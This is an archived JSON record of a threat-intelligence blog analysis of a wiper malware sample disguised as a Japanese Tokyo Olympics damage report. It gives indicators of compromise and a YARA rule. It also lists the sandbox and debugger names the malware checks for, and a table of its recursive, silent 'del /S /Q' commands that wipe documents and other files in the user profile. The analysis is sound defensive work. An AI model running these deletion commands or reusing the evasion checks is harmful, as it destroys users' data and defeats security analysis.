{
	"id": "15a07357-5fa0-4f72-9617-594434876ee5",
	"created_at": "2026-04-06T02:13:09.816168Z",
	"updated_at": "2026-04-10T13:12:27.001106Z",
	"deleted_at": null,
	"sha1_hash": "92d00aa618fcfd35b40346913b905e3a16d27096",
	"title": "Analysis of Wiper Malware Disguised as Tokyo Olympics Doc",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1031851,
	"plain_text": "Analysis of Wiper Malware Disguised as Tokyo Olympics Doc\r\nBy cybleinc\r\nPublished: 2021-08-02 · Archived: 2026-04-06 01:29:16 UTC\r\nRead Cyble's research on a new variant of the Wiper malware that is disguised as a Tokyo Olympics document.\r\nRecently, Cyble Research Labs came across a new malware sample on the surface web. The malware in question belongs to the Wiper family. The sample was posted by a security researcher on Twitter. From VirusTotal, we learned that the original name of the malware is 【至急】東京オリンピック開催に伴うサイバー攻撃等発生に関する被害報告について.exe. The translation of the file name is “[Urgent] About the damage report about the occurrence of cyber-attacks etc. accompanying the Tokyo Olympics.exe”.\r\nIn this case, the name of the sample suggests that it could be used to leverage the interest surrounding the Tokyo Olympics.\r\nThe Wiper malware family has been created with the intent to delete selected documents whose extensions are predefined in the malware by the Threat Actor (TA). Figure 1 showcases the complete execution flow of the Wiper malware.\r\nhttps://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/\r\nPage 1 of 9\n\nFigure 1: Wiper Malware Execution Flow\r\nTechnical Analysis\r\nThe static analysis of the malware indicated that it is packed using Ultimate Packer for Executables (UPX), an open-source executable packer that supports various file formats across operating systems. After unpacking the malware, we found that it is an x86 console-based application. It was developed in C/C++ and compiled on “2021-07-20 06:52:05”. These details are shown in Figure 1. The malware also uses an Adobe PDF icon to trick unsuspecting users into opening the malware.
\r\nFigure 2: Malware’s Static Details\r\nBased on our initial observations, Cyble researchers found that the malware doesn’t perform any other activities apart from deleting itself from the victim’s device. Similarly, we can see in Figure 3 that the malware executes the “Del” command to delete itself.\r\nFigure 3: Wiper Malware’s Process Tree\r\nCode Analysis\r\nOur research indicates that the TA behind the malware has added multiple anti-VM, anti-debugging and anti-sandbox techniques, as shown in Figure 4. These techniques include checking for ProcMon, VM detection, debugger detection, Sleep, and EnumWindows, etc.\r\nFigure 4: Code to Detect VM and Debugger\r\nUsing the EnumWindows API call, the malware checks whether any of the strings listed in Table 1 match the titles of top-level application windows, to determine whether any malware analysis tools are running in the background.\r\nPROCMON_WINDOW_CLASS\r\nOllyDbg\r\nTIdaWindow\r\nWinDbgFrameClass\r\nFilemonClass\r\nID\r\nRegmonClass\r\nPROCEXPL\r\nTCPViewClass\r\nSmartSniff\r\nAutoruns\r\nCNetmonMainFrame\r\nTFormFileAlyzer2\r\nProcessHacker\r\nTable 1: Running Process Strings\r\nOur research indicates that the Wiper malware also checks for the processes shown in Table 2 to determine if it is running in any malware analysis environment.
In case these processes are running, the malware exits and deletes itself.\r\nWireshark.exe\r\napateDNS.exe\r\nAutoruns.exe\r\nbindiff.exe\r\nidaq.exe\r\nidaq64.exe\r\nProcmon.exe\r\nx64dbg.exe\r\nx32dbg.exe\r\nollydbg.exe\r\nImmunityDebugger.exe\r\nVBoxTray.exe\r\nVBoxService.exe\r\nmsedge.exe\r\nVirtualBox.exe\r\njavaw.exe\r\nx96dbg.exe\r\nidaw.exe\r\nwindbg.exe\r\ndnSpy.exe\r\nHxD.exe\r\nScylla_x64.exe\r\nScylla_x86.exe\r\nregmon.exe\r\nprocexp.exe\r\nprocexp64.exe\r\nTcpview.exe\r\nsmsniff.exe\r\nFakeNet.exe\r\nnetmon.exe\r\nPEiD.exe\r\nLordPE.exe\r\nPE-bear.exe\r\nPPEE.exe\r\ndie.exe\r\ndiel.exe\r\npexplorer.exe\r\ndepends.exe\r\nResourceHacker.exe\r\nFileAlyzer2.exe\r\nprocesshacker.exe\r\nRegshot-x64-Unicode.exe\r\nTable 2: Process List\r\nFigure 5 shows the malware comparing the running processes with the process list.\r\nFigure 5: Process Comparison\r\nThe malware also checks whether a software breakpoint has been set on its VM-detection routine, as shown in Figure 6.\r\nFigure 6: Code to Check Soft Breakpoints\r\nThe TA has added the above checks to ensure that the malware runs on a physical device and not in any malware analysis environment. If any one of the checks is positive, the malware exits and deletes itself.\r\nOnce all the checks are done, the malware executes a series of commands to delete the files that have the extensions specified by the TA in the malware, as shown in Figure 7.
\r\nFigure 7: Malware Executing Command to Delete *.doc Files\r\nThe series of commands used to delete files that have the extensions specified by the TA are given in Table 3 (/S recurses into subdirectories and /Q suppresses the confirmation prompt, so each command silently removes every matching file under the user’s profile).\r\ndel /S /Q *.doc c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.docm c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.docx c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.dot c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.dotm c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.dotx c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.pdf c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.csv c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.xls c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.xlsx c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.xlsm c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.ppt c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.pptx c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.pptm c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.jtdc c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.jttc c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.jtd c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.jtt c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.txt c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.exe c:\\\\users\\\\%username%\\\\ \u003e nul\r\ndel /S /Q *.log c:\\\\users\\\\%username%\\\\ \u003e nul\r\nTable 3: Commands Executed by Malware\r\nAs we can see in Table 3, the malware targets several file extensions including .jtd, which is an extension for a Japanese word processor.\r\nOnce it executes all the commands given in Table 3, it runs the curl command to access an adult website. However, the intent of this behavior is unknown.
\r\nFigure 8 shows the execution of the curl command to access the adult website.\r\nFigure 8: Curl Command Execution\r\nThe malware self-destructs after completing all the activities discussed above.\r\nConclusion\r\nBased on the name of the malware executable file, “[Urgent] About the damage report about the occurrence of cyber-attacks etc. accompanying the Tokyo Olympics .exe”, and the fact that the malware checks for .jtd extensions, we suspect that it has been potentially created to leverage the recent interest around the Tokyo Olympics.\r\nThe TA provided this malware with the functionality to delete files that have extensions specified by the TA. It does not demonstrate any other behavior that is generally displayed by malware.\r\nCyble Research Labs is continuously monitoring security threats, whether they are ongoing or emerging. We will continue to update our readers with our latest findings.\r\nOur Recommendations\r\nWe have listed some of the essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the suggestions given below:\r\nUse strong passwords and enforce multi-factor authentication wherever possible.\r\nTurn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.\r\nUse a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.\r\nRefrain from opening untrusted links and email attachments without verifying their authenticity.\r\nConduct regular backup practices and keep those backups offline or in a separate network.
\r\nMITRE ATT\u0026CK® Techniques:\r\nTactic  Technique ID  Technique Name\r\nExecution  T1204  User Execution\r\nDefense Evasion  T1497  Virtualization/Sandbox Evasion\r\nImpact  T1485  Data Destruction\r\nIndicators of Compromise (IoCs):\r\nIndicators  Indicator type  Description\r\nfb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97  Hash  SHA-256\r\n295d0aa4bf13befebafd7f5717e7e4b3b41a2de5ef5123ee699d38745f39ca4f  Hash  SHA-256\r\nGeneric Signatures and Rules\r\nYara Rules\r\nrule win32_tokyoolympicdeleter\r\n{\r\n    meta:\r\n        author = \"Cyble Research\"\r\n        date = \"2021-08-03\"\r\n        description = \"Coverage for Malware targeting Tokyo Olympics\"\r\n        hash = \"fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97\"\r\n    strings:\r\n        $header = \"MZ\"\r\n        $sig1 = \"meClassOFilemon\" wide ascii\r\n        $sig2 = \"iewSmartSniffg\" wide ascii\r\n        $sig3 = \"TFormFileAlyzer2\" wide ascii\r\n        $sig4 = \"TIdaWindow\" wide ascii\r\n    condition:\r\n        $header at 0 and (2 of ($sig*))\r\n}\r\nAbout Us\r\nCyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the Darkweb. Its prime focus is to provide organizations with real-time visibility to their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Start-ups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.com.
\r\nSource: https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/"
	],
	"report_names": [
		"a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document"
	],
	"threat_actors": [],
	"ts_created_at": 1775441589,
	"ts_updated_at": 1775826747,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/92d00aa618fcfd35b40346913b905e3a16d27096.pdf",
		"text": "https://archive.orkl.eu/92d00aa618fcfd35b40346913b905e3a16d27096.txt",
		"img": "https://archive.orkl.eu/92d00aa618fcfd35b40346913b905e3a16d27096.jpg"
	}
}